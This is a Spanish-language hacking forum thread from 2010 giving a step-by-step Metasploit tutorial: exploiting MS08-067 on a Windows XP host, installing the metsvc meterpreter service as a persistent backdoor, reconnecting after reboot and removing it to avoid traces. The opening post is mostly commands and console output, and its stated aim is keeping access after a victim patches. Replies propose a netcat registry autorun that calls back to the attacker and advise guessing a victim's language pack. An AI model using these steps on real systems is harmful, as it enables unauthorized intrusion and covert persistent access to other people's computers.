[Metasploit] Crear un Backdoor con meterpreter

Iniciado por Shell Root, 6 Enero 2010, 04:03 AM

0 Miembros y 2 Visitantes están viendo este tema.

Shell Root

[Metasploit] Crear un Backdoor con meterpreter


Primero, necesitamos una sesión de meterpreter en el sistema remoto.


                                  _             
                                 | |      o     
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  | 
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|                   
                           \|                   


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 489 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8074 updated today (2010.01.05)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST 172.16.83.1
LHOST => 172.16.83.1
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 3 opened (172.16.83.1:54745 -> 172.16.83.128:4444)

meterpreter >


Una vez conseguida, ejecutamos metsrv, que instalará como servicio un servidor de meterpreter en el host remoto.


meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\HdOFwlxzpobWuh...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.


Ahora, si queremos, podemos reiniciar el sistema remoto, aunque el servicio ya está corriendo.


meterpreter > reboot
Rebooting...
meterpreter >


Ahora, cuando se reinicie el host remoto, vamos a conectarnos al servicio de meterpreter que acabamos de instalar.

Para ello, usaremos el handler para que nos porte el exploit windows/metsvc_bind_tcp, lo configuraremos y nos conectaremos, como haré yo.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 1 opened (172.16.83.1:42050 -> 172.16.83.128:31337)

meterpreter >


Y ya está! Esto nos viene bien por si el host remoto aplica un parche que corrija sus vulnerabilidades.
Aunque parchee el sistema, nosotros tendremos acceso a su sistema a través de ese backdoor.

Y si queremos desinstar el metsvc en el host remoto para no dejar rastro, tan sólo tenemos que ejecutar metsvc -r en nuestra sesión de meterpreter.


meterpreter > run metsvc -r
[*] Removing the existing Meterpreter service
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\QQqawIYOjLq...
[*]  >> Uploading metsvc.exe...
[*] Stopping the service...
* Stopping service metsvc
* Removing service
Service metsvc successfully removed.

meterpreter >


Y quedará metsvc completamente desinstalado sin perder la sesión que estamos utilizando (Por si cambiamos de idea xD)

Un saludo.

Fuente: Not Spam http://foro.portalhacker.net/index.php/topic,100609.0.html
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Masita

Lo que yo me estaba preguntando es ¿hay un metsvc con conexion inversa?  Lo buscaria yo mismo en el Metasploit pero ahora no puedo abrirlo.
En el cielo estan suspendidas las palabras que cantamos en nuestros sueños....

kamsky

no se si habrá con conexión inversa, supongo que si, pero en caso contrario, puedes hacer todo un poco más "artesanal", y ser tú el que cree la entrada en el registro apuntando a un ejecutable, por ejemplo el netcat, para que cada vez que se reinicie el pc se conecte a donde quieras...

este método está explicado en https://foro.elhacker.net/hacking_basico/mini_howto_usando_meterpreter-t275163.0.html , sólo tienes que amoldarlo para que se comporte como te dije

salu2
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Masita

Gracias por la respuesta Kamsky, comentaba metsvc, por que me devolviese una sesion de Meterpreter en lugar de un CMD.exe, y asi usar las funcionalidades extra que aporta. Si no siempre quedan los metodos tradicionales de nuestra querida navaja suiza.  :P
En el cielo estan suspendidas las palabras que cantamos en nuestros sueños....

Debci

Buff no me explota por no sqber que lenguaje usa...

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.


kamsky

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Debci


kamsky

pues hombre, una forma es "imaginártelo", es decir, sabes de que pais es la víctima?? pues sabiendo eso prueba el idioma natal, y si no es ese pues en el 99% de los casos será inglés o variantes
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!